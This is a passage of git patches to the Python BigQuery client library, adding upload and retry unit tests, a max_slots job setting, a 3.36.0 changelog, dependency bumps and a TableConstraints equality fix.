_mock_transport(http.client.OK, response_headers) + client = _make_client(_http=fake_transport) + conn = client._connection = make_connection() + if mtls: + conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") + + # Create some mock arguments and call the method under test. 
+ data = b"goodbye gudbi gootbee" + stream = io.BytesIO(data) + config = LoadJobConfig() + config.source_format = SourceFormat.CSV + job = LoadJob(None, None, TABLE_REF, client, job_config=config) + metadata = job.to_api_repr() + upload, transport_out = client._initiate_resumable_upload( + stream, metadata, num_retries, None + ) + + # Check the returned values. + assert isinstance(upload, ResumableUpload) + + host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" + upload_url = ( + f"{host_name}/upload/bigquery/v2/projects/{PROJECT}/jobs?uploadType=resumable" + ) + assert upload.upload_url == upload_url + expected_headers = _get_upload_headers(conn.user_agent) + assert upload._headers == expected_headers + assert not upload.finished + assert upload._chunk_size == _DEFAULT_CHUNKSIZE + assert upload._stream is stream + assert upload._total_bytes is None + assert upload._content_type == _GENERIC_CONTENT_TYPE + assert upload.resumable_url == resumable_url + + retry_strategy = upload._retry_strategy + assert retry_strategy.max_sleep == 64.0 + if num_retries is None: + assert retry_strategy.max_cumulative_retry == 600.0 + assert retry_strategy.max_retries is None + else: + assert retry_strategy.max_cumulative_retry is None + assert retry_strategy.max_retries == num_retries + assert transport_out is fake_transport + # Make sure we never read from the stream. + assert stream.tell() == 0 + + # Check the mocks. 
+ request_headers = expected_headers.copy() + request_headers["x-upload-content-type"] = _GENERIC_CONTENT_TYPE + fake_transport.request.assert_called_once_with( + "POST", + upload_url, + data=json.dumps(metadata).encode("utf-8"), + headers=request_headers, + timeout=mock.ANY, + ) + + +def test__initiate_resumable_upload(): + _initiate_resumable_upload_helper() + + +def test__initiate_resumable_upload_mtls(): + _initiate_resumable_upload_helper(mtls=True) + + +def test_initiate_resumable_upload_with_retry(): + _initiate_resumable_upload_helper(num_retries=11) + + +def _do_multipart_upload_success_helper( + get_boundary, num_retries=None, project=None, mtls=False +): + from google.cloud.bigquery.client import _get_upload_headers + from google.cloud.bigquery.job import LoadJob + from google.cloud.bigquery.job import LoadJobConfig + from google.cloud.bigquery.job import SourceFormat + + fake_transport = _mock_transport(http.client.OK, {}) + client = _make_client(_http=fake_transport) + conn = client._connection = make_connection() + if mtls: + conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") + + if project is None: + project = PROJECT + + # Create some mock arguments. + data = b"Bzzzz-zap \x00\x01\xf4" + stream = io.BytesIO(data) + config = LoadJobConfig() + config.source_format = SourceFormat.CSV + job = LoadJob(None, None, TABLE_REF, client, job_config=config) + metadata = job.to_api_repr() + size = len(data) + + response = client._do_multipart_upload( + stream, metadata, size, num_retries, None, project=project + ) + + # Check the mocks and the returned value. 
+ assert response is fake_transport.request.return_value + assert stream.tell() == size + get_boundary.assert_called_once_with() + + host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" + upload_url = ( + f"{host_name}/upload/bigquery/v2/projects/{project}/jobs?uploadType=multipart" + ) + payload = ( + b"--==0==\r\n" + b"content-type: application/json; charset=UTF-8\r\n\r\n" + b"%(json_metadata)s" + b"\r\n" + b"--==0==\r\n" + b"content-type: */*\r\n\r\n" + b"%(data)s" + b"\r\n" + b"--==0==--" + ) % {b"json_metadata": json.dumps(metadata).encode("utf-8"), b"data": data} + + headers = _get_upload_headers(conn.user_agent) + headers["content-type"] = b'multipart/related; boundary="==0=="' + fake_transport.request.assert_called_once_with( + "POST", upload_url, data=payload, headers=headers, timeout=mock.ANY + ) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload(get_boundary): + _do_multipart_upload_success_helper(get_boundary) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload_mtls(get_boundary): + _do_multipart_upload_success_helper(get_boundary, mtls=True) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test_do_multipart_upload_with_retry(get_boundary): + _do_multipart_upload_success_helper(get_boundary, num_retries=8) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload_with_custom_project(get_boundary): + _do_multipart_upload_success_helper(get_boundary, project="custom-project") + + +def test__do_resumable_upload(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + result = client._do_resumable_upload(file_obj, EXPECTED_CONFIGURATION, None, None) + + content = 
result.content.decode("utf-8") + assert json.loads(content) == {"size": file_obj_len} + + transport.request.assert_any_call( + "POST", + mock.ANY, + data=json.dumps(EXPECTED_CONFIGURATION).encode("utf-8"), + headers=mock.ANY, + timeout=mock.ANY, + ) + + +def test__do_resumable_upload_custom_project(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + result = client._do_resumable_upload( + file_obj, + EXPECTED_CONFIGURATION, + None, + None, + project="custom-project", + ) + + content = result.content.decode("utf-8") + assert json.loads(content) == {"size": file_obj_len} + + transport.request.assert_any_call( + "POST", + mock.ANY, + data=json.dumps(EXPECTED_CONFIGURATION).encode("utf-8"), + headers=mock.ANY, + timeout=mock.ANY, + ) + + initiation_url = next( + ( + call[0][1] + for call in transport.request.call_args_list + if call[0][0] == "POST" and "uploadType=resumable" in call[0][1] + ), + None, + ) + assert initiation_url is not None + assert "projects/custom-project" in initiation_url + + +def test__do_resumable_upload_custom_timeout(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + client._do_resumable_upload( + file_obj, EXPECTED_CONFIGURATION, num_retries=0, timeout=3.14 + ) + + for call_args in transport.request.call_args_list: + assert call_args[1].get("timeout") == 3.14 + + +def test__do_multipart_upload_request_body(): + transport = _make_transport([_make_response(http.client.OK)]) + client = _make_client(_http=transport) + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + + client._do_multipart_upload( + file_obj, EXPECTED_CONFIGURATION, file_obj_len, None, None + ) + + request_args = transport.request.mock_calls[0][2] + request_data = 
request_args["data"].decode("utf-8") + request_headers = request_args["headers"] + + request_content = email.message_from_string( + "Content-Type: {}\n{}".format( + request_headers["content-type"].decode("utf-8"), request_data + ) + ) + + configuration_data = request_content.get_payload(0).get_payload() + binary_data = request_content.get_payload(1).get_payload() + + assert json.loads(configuration_data) == EXPECTED_CONFIGURATION + assert binary_data.encode("utf-8") == file_obj.getvalue() + + +def test__do_multipart_upload_wrong_size(): + client = _make_client() + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + + with pytest.raises(ValueError): + client._do_multipart_upload(file_obj, {}, file_obj_len + 1, None, None) + + +def test_schema_from_json_with_file_path(): + from google.cloud.bigquery.schema import SchemaField + + file_content = """ + [ + { + "description": "quarter", + "mode": "REQUIRED", + "name": "qtr", + "type": "STRING" + }, + { + "description": "sales representative", + "mode": "NULLABLE", + "name": "rep", + "type": "STRING" + }, + { + "description": "total sales", + "mode": "NULLABLE", + "name": "sales", + "type": "FLOAT" + } + ]""" + + expected = [ + SchemaField("qtr", "STRING", "REQUIRED", description="quarter"), + SchemaField( + "rep", + "STRING", + "NULLABLE", + description="sales representative", + ), + SchemaField( + "sales", + "FLOAT", + "NULLABLE", + description="total sales", + ), + ] + + client = _make_client() + mock_file_path = "/mocked/file.json" + + open_patch = mock.patch("builtins.open", new=mock.mock_open(read_data=file_content)) + + with open_patch as _mock_file: + actual = client.schema_from_json(mock_file_path) + _mock_file.assert_called_once_with(mock_file_path) + _mock_file.return_value.read.assert_called_once() + + assert expected == actual diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py new file mode 100644 index 000000000..6e49cc464 --- /dev/null +++ 
b/tests/unit/test_client_retry.py @@ -0,0 +1,279 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from unittest import mock + +import freezegun +import google.api_core.exceptions +from google.cloud.bigquery import job as bqjob +from google.cloud.bigquery.retry import DEFAULT_RETRY +from .helpers import make_connection + + +PROJECT = "test-project" + + +def _make_credentials(): + import google.auth.credentials + + return mock.Mock(spec=google.auth.credentials.Credentials) + + +def _make_client(*args, **kw): + from google.cloud.bigquery.client import Client + + return Client(*args, **kw) + + +def test_get_service_account_email_w_custom_retry(global_time_lock): + api_path = f"/projects/{PROJECT}/serviceAccount" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + + resource = { + "kind": "bigquery#getServiceAccountResponse", + "email": "bq-123@bigquery-encryption.iam.gserviceaccount.com", + } + api_request_patcher = mock.patch.object( + client._connection, + "api_request", + side_effect=[ValueError, resource], + ) + + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, ValueError) + ) + + with api_request_patcher as fake_api_request: + with mock.patch( + "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" + ) as final_attributes: + service_account_email = client.get_service_account_email( + retry=retry, timeout=7.5 + 
) + + final_attributes.assert_called_once_with({"path": api_path}, client, None) + assert service_account_email == "bq-123@bigquery-encryption.iam.gserviceaccount.com" + assert fake_api_request.call_args_list == [ + mock.call(method="GET", path=api_path, timeout=7.5), + mock.call(method="GET", path=api_path, timeout=7.5), # was retried once + ] + + +def test_call_api_applying_custom_retry_on_timeout(global_time_lock): + from concurrent.futures import TimeoutError + + creds = _make_credentials() + client = _make_client(project=PROJECT, credentials=creds) + + api_request_patcher = mock.patch.object( + client._connection, + "api_request", + side_effect=[TimeoutError, "result"], + ) + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, TimeoutError) + ) + + with api_request_patcher as fake_api_request: + result = client._call_api(retry, foo="bar") + + assert result == "result" + assert fake_api_request.call_args_list == [ + mock.call(foo="bar"), + mock.call(foo="bar"), + ] + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404( + global_time_lock, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404, but we know + because of the conflict that really the job does exist. Retry until we + get the job status (or timeout). + """ + job_id = "abc123" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection( + # We're mocking QueryJob._begin, so this is only going to be + # jobs.get requests and responses. 
+ google.api_core.exceptions.TooManyRequests("this is retriable by default"), + google.api_core.exceptions.NotFound("we lost your job"), + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": PROJECT, + "location": "TESTLOC", + "jobId": job_id, + } + }, + ) + + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_begin_patcher, job_id_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path] + * 4, + ) + assert result.job_id == job_id + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( + global_time_lock, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404. If it keeps + failing with a 404, assume that the job actually doesn't exist. + """ + job_id_1 = "abc123" + job_id_2 = "xyz789" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + + # We're mocking QueryJob._begin, so that the connection should only get + # jobs.get requests. 
+ job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + conn = client._connection = make_connection( + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": PROJECT, + "location": "TESTLOC", + "jobId": job_id_2, + } + }, + ) + + # Choose a small deadline so the 404 retries give up. + retry = google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + side_effect=[job_id_1, job_id_2], + ) + retry_patcher = mock.patch.object( + google.cloud.bigquery.retry, + "_DEFAULT_GET_JOB_CONFLICT_RETRY", + retry, + ) + + with freezegun.freeze_time( + "2025-01-01 00:00:00", + # 10x the retry deadline to guarantee a timeout. + auto_tick_seconds=10, + ), job_begin_patcher, job_id_patcher, retry_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path_1 = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id_1}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + jobs_get_path_2 = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id_2}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. 
+ [jobs_get_path_1, jobs_get_path_2], + ) + assert result.job_id == job_id_2 + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retry(global_time_lock): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + If we get a 409 conflict on jobs.insert, and we are using a random + job ID, we should retry by getting the job by ID. This test ensures that + if the get job by ID fails, we retry the whole sequence. + """ + from google.cloud.bigquery import job + + client = _make_client(project=PROJECT, credentials=_make_credentials()) + job_id = "some-random-job-id" + query_text = "SELECT 1" + job_config = job.QueryJobConfig() + job_config.use_legacy_sql = False + + job_resource = { + "jobReference": {"projectId": PROJECT, "jobId": job_id}, + "configuration": {"query": {"query": query_text}}, + "status": {"state": "DONE"}, + } + + conn = make_connection( + # First attempt at jobs.insert fails with a 409 + google.api_core.exceptions.Conflict("Job already exists."), + # First attempt at jobs.get fails with a 500 + google.api_core.exceptions.InternalServerError("get job failed"), + # Second attempt at jobs.insert succeeds + job_resource, + ) + client._connection = conn + + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_id_patcher: + query_job = client.query(query_text, job_config=job_config, job_id=None) + + assert query_job.job_id == job_id diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 7144c640b..7343fed3d 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -80,7 +80,7 @@ ), ], ) -def test_retry_failed_jobs(sleep, reason, job_retry, result_retry): +def test_retry_failed_jobs(sleep, reason, job_retry, result_retry, global_time_lock): client = make_client() err = dict(reason=reason) conn = client._connection = make_connection( @@ -138,7 +138,7 @@ def test_retry_failed_jobs(sleep, reason, 
job_retry, result_retry): def test_retry_connection_error_with_default_retries_and_successful_first_job( - monkeypatch, client + monkeypatch, client, global_time_lock ): """ Make sure ConnectionError can be retried at `is_job_done` level, even if @@ -254,7 +254,7 @@ def make_job_id(*args, **kwargs): def test_query_retry_with_default_retry_and_ambiguous_errors_only_retries_with_failed_job( - client, monkeypatch + client, monkeypatch, global_time_lock ): """ Some errors like 'rateLimitExceeded' can be ambiguous. Make sure we only @@ -419,7 +419,7 @@ def make_job_id(*args, **kwargs): # - Pass None retry to `result`. @pytest.mark.parametrize("job_retry_on_query", ["Query", "Result"]) @mock.patch("time.sleep") -def test_disable_retry_failed_jobs(sleep, client, job_retry_on_query): +def test_disable_retry_failed_jobs(sleep, client, job_retry_on_query, global_time_lock): """ Test retry of job failures, as opposed to API-invocation failures. """ @@ -450,7 +450,7 @@ def api_request(method, path, query_params=None, data=None, **kw): @mock.patch("time.sleep") -def test_retry_failed_jobs_after_retry_failed(sleep, client): +def test_retry_failed_jobs_after_retry_failed(sleep, client, global_time_lock): """ If at first you don't succeed, maybe you will later. 
:) """ @@ -508,7 +508,7 @@ def api_request(method, path, query_params=None, data=None, **kw): assert job.job_id != orig_job_id -def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): +def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client, global_time_lock): with pytest.raises( TypeError, match=( @@ -520,7 +520,9 @@ def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): client.query("select 42", job_id=42, job_retry=google.api_core.retry.Retry()) -def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): +def test_raises_on_job_retry_on_result_with_non_retryable_jobs( + client, global_time_lock +): client._connection = make_connection({}) with pytest.warns( @@ -542,7 +544,7 @@ def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): job.result(job_retry=google.api_core.retry.Retry()) -def test_query_and_wait_retries_job_for_DDL_queries(): +def test_query_and_wait_retries_job_for_DDL_queries(global_time_lock): """ Specific test for retrying DDL queries with "jobRateLimitExceeded" error: https://github.com/googleapis/python-bigquery/issues/1790 From 84fa75b3e52d41f3778c1654779f03598919168f Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 20 Aug 2025 15:03:23 -0500 Subject: [PATCH 163/202] chore(main): release 3.36.0 (#2255) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 14 ++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 374448a5e..62352c344 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,20 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.36.0](https://github.com/googleapis/python-bigquery/compare/v3.35.1...v3.36.0) (2025-08-20) + + +### Features + +* Add created/started/ended properties to RowIterator. 
([#2260](https://github.com/googleapis/python-bigquery/issues/2260)) ([0a95b24](https://github.com/googleapis/python-bigquery/commit/0a95b24192395cc3ccf801aa9bc318999873a2bf)) +* Retry query jobs if `jobBackendError` or `jobInternalError` are encountered ([#2256](https://github.com/googleapis/python-bigquery/issues/2256)) ([3deff1d](https://github.com/googleapis/python-bigquery/commit/3deff1d963980800e8b79fa3aaf5b712d4fd5062)) + + +### Documentation + +* Add a TROUBLESHOOTING.md file with tips for logging ([#2262](https://github.com/googleapis/python-bigquery/issues/2262)) ([b684832](https://github.com/googleapis/python-bigquery/commit/b68483227693ea68f6b12eacca2be1803cffb1d1)) +* Update README to break infinite redirect loop ([#2254](https://github.com/googleapis/python-bigquery/issues/2254)) ([8f03166](https://github.com/googleapis/python-bigquery/commit/8f031666114a826da2ad965f8ecd4727466cb480)) + ## [3.35.1](https://github.com/googleapis/python-bigquery/compare/v3.35.0...v3.35.1) (2025-07-21) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index d565bc46e..a8f4c8e14 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.35.1" +__version__ = "3.36.0" From ef2740a158199633b5543a7b6eb19587580792cd Mon Sep 17 00:00:00 2001 From: shollyman Date: Tue, 26 Aug 2025 10:52:30 -0500 Subject: [PATCH 164/202] feat: updates to fastpath query execution (#2268) This PR updates query handling to allow base config properties like job timeout, reservation, and a preview max slots field to leverage the faster path (e.g. using jobs.query rather than jobs.insert). 
--- google/cloud/bigquery/_job_helpers.py | 3 ++ google/cloud/bigquery/job/base.py | 31 ++++++++++++++++++++ tests/unit/job/test_base.py | 41 +++++++++++++++++++++++++++ tests/unit/job/test_query_config.py | 5 ++++ tests/unit/test__job_helpers.py | 28 ++++++++++++++++++ 5 files changed, 108 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 6fd561f8c..27e90246f 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -658,6 +658,9 @@ def _supported_by_jobs_query(request_body: Dict[str, Any]) -> bool: "requestId", "createSession", "writeIncrementalResults", + "jobTimeoutMs", + "reservation", + "maxSlots", } unsupported_keys = request_keys - keys_allowlist diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index f007b9341..1344082be 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -224,6 +224,37 @@ def job_timeout_ms(self, value): else: self._properties.pop("jobTimeoutMs", None) + @property + def max_slots(self) -> Optional[int]: + """The maximum rate of slot consumption to allow for this job. + + If set, the number of slots used to execute the job will be throttled + to try and keep its slot consumption below the requested rate. + This feature is not generally available. + """ + + max_slots = self._properties.get("maxSlots") + if max_slots is not None: + if isinstance(max_slots, str): + return int(max_slots) + if isinstance(max_slots, int): + return max_slots + return None + + @max_slots.setter + def max_slots(self, value): + try: + value = _int_or_none(value) + except ValueError as err: + raise ValueError("Pass an int for max slots, e.g. 100").with_traceback( + err.__traceback__ + ) + + if value is not None: + self._properties["maxSlots"] = str(value) + else: + self._properties.pop("maxSlots", None) + @property def reservation(self): """str: Optional. The reservation that job would use. 
diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index f5861f645..420904820 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -1276,3 +1276,44 @@ def test_reservation_setter(self): job_config = self._make_one() job_config.reservation = "foo" self.assertEqual(job_config._properties["reservation"], "foo") + + def test_max_slots_miss(self): + job_config = self._make_one() + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_set_and_clear(self): + job_config = self._make_one() + job_config.max_slots = 14 + self.assertEqual(job_config.max_slots, 14) + job_config.max_slots = None + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_hit_str(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = "4" + self.assertEqual(job_config.max_slots, 4) + + def test_max_slots_hit_int(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = int(3) + self.assertEqual(job_config.max_slots, 3) + + def test_max_slots_hit_invalid(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = object() + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_update_in_place(self): + job_config = self._make_one() + job_config.max_slots = 45 # update in place + self.assertEqual(job_config.max_slots, 45) + + def test_max_slots_setter_invalid(self): + job_config = self._make_one() + with self.assertRaises(ValueError): + job_config.max_slots = "foo" + + def test_max_slots_setter(self): + job_config = self._make_one() + job_config.max_slots = 123 + self.assertEqual(job_config._properties["maxSlots"], "123") diff --git a/tests/unit/job/test_query_config.py b/tests/unit/job/test_query_config.py index e0878d067..a63a14b73 100644 --- a/tests/unit/job/test_query_config.py +++ b/tests/unit/job/test_query_config.py @@ -172,6 +172,11 @@ def test_incremental_results(self): config.write_incremental_results = True 
self.assertEqual(config.write_incremental_results, True) + def test_max_slots(self): + config = self._get_target_class()() + config.max_slots = 99 + self.assertEqual(config.max_slots, 99) + def test_create_session(self): config = self._get_target_class()() self.assertIsNone(config.create_session) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 1f543f033..10cbefe13 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -200,6 +200,19 @@ def make_query_response( make_query_request({"writeIncrementalResults": True}), id="job_config-with-incremental-results", ), + pytest.param( + job_query.QueryJobConfig( + reservation="foo", + max_slots=100, + ), + make_query_request( + { + "maxSlots": "100", + "reservation": "foo", + } + ), + id="job_config-with-reservation-and-slots", + ), ), ) def test__to_query_request(job_config, expected): @@ -1048,6 +1061,21 @@ def test_make_job_id_w_job_id_overrides_prefix(): True, id="write_incremental_results", ), + pytest.param( + job_query.QueryJobConfig(job_timeout_ms=1000), + True, + id="job_timeout_ms", + ), + pytest.param( + job_query.QueryJobConfig(reservation="foo"), + True, + id="reservation", + ), + pytest.param( + job_query.QueryJobConfig(max_slots=20), + True, + id="max_slots", + ), ), ) def test_supported_by_jobs_query_from_queryjobconfig( From 43527af24e56994357205b482a86b805950d2d0f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 3 Sep 2025 18:27:17 +0200 Subject: [PATCH 165/202] chore(deps): update all dependencies (#2259) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 10 +++++----- samples/magics/requirements.txt | 6 +++--- samples/notebooks/requirements.txt | 10 +++++----- samples/snippets/requirements.txt | 2 +- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index e7a02eca5..f86e57e5c 100644 --- 
a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index fa54cc229..c2bd74bed 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,7 +1,7 @@ attrs==25.3.0 certifi==2025.8.3 cffi==1.17.1 -charset-normalizer==3.4.2 +charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' click-plugins==1.1.1.2 @@ -13,7 +13,7 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 @@ -24,7 +24,7 @@ idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.1 +pandas==2.3.2 proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 @@ -34,11 +34,11 @@ pyparsing==3.2.3 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 -requests==2.32.4 +requests==2.32.5 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.14.1 +typing-extensions==4.15.0 typing-inspect==0.9.0 urllib3==2.5.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index e7230053c..7b4f84e8e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.10.2 +bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.35.1 +google.cloud.bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.3.1 +pandas==2.3.2 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 829f08f47..dc22903c7 100644 --- a/samples/notebooks/requirements.txt +++ 
b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ -bigquery-magics==0.10.2 +bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.4.0; python_version >= '3.10' +ipython==9.5.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.5; python_version >= '3.10' -pandas==2.3.1 +matplotlib==3.10.6; python_version >= '3.10' +pandas==2.3.2 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index afa62b6b8..23da68d60 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 From 435ecdb62d8402fea317763e48934fa510ce8026 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 3 Sep 2025 14:30:49 -0400 Subject: [PATCH 166/202] bug: updates `__eq__` comparison on TableConstraint (#2274) * bug: updates __eq__ comparison on TableConstraint * updates tests * moves test out of class to accommodate pytest params --- google/cloud/bigquery/table.py | 6 +- tests/unit/test_table.py | 144 ++++++++++++++++----------------- 2 files changed, 71 insertions(+), 79 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 219b31467..5efcb1958 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3574,9 +3574,9 @@ def __init__( def __eq__(self, other): if not isinstance(other, TableConstraints) and other is not None: raise TypeError("The value provided is not a BigQuery TableConstraints.") - return ( - self.primary_key == other.primary_key if other.primary_key else None - ) and (self.foreign_keys == other.foreign_keys if other.foreign_keys else None) + return self.primary_key == ( + other.primary_key if other.primary_key else None + ) and self.foreign_keys == 
